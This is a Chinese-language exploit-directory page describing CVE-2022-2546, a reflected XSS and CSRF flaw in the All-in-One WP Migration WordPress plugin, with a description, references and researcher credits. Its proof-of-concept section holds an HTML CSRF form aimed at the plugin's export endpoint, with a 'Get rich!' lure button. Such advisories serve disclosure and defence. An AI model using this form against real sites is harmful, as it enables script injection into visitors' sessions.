Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-2546 — All-in-One WP Migration < 7.63 - 未认证的反射型 XSS + CSRF | Kitploit
工具/GitHubGitHub/openxp-research/cve-2022-2546
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubopenxp-research/cve-2022-2546

CVE-2022-2546

All-in-One WP Migration < 7.63 - 未认证的反射型 XSS + CSRF

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

All-in-One WP Migration < 7.63 - 未认证反射型 XSS + CSRF

描述

该插件为 ai1wm_export 操作的响应使用了错误的 Content-Type,并且未正确转义该响应,从而允许攻击者构造一个请求;当任何访客提交该请求时,会在响应中注入任意 HTML 或 JavaScript,并在受害者的会话中执行。

概念验证

攻击者

要复现该漏洞,我们可以通过插件导出网站的全部内容,并在输出文件名中插入一个无效名称。

攻击者视频

在验证该漏洞时,可以将攻击与 CSRF 相结合,从而强制受害者的浏览器发送带有该 Payload 的请求。

受害者

受害者视频

代码

root@kitploit:~
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="">

  <input type="submit" value="Get rich!">
</form>

受影响版本

All-in-One WP Migration < 7.63

参考资料

Sucuri

WPScan

Hacking Force

跨站脚本 (XSS)

分类

类型:跨站脚本 (XSS)

OWASP TOP 10: A03:2021-Injection

CWE: CWE-79 在网页生成期间对输入的错误中和 ('跨站脚本')

研究人员/黑客

Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) 和 Guilherme Acerbi (Ghost).

下载工具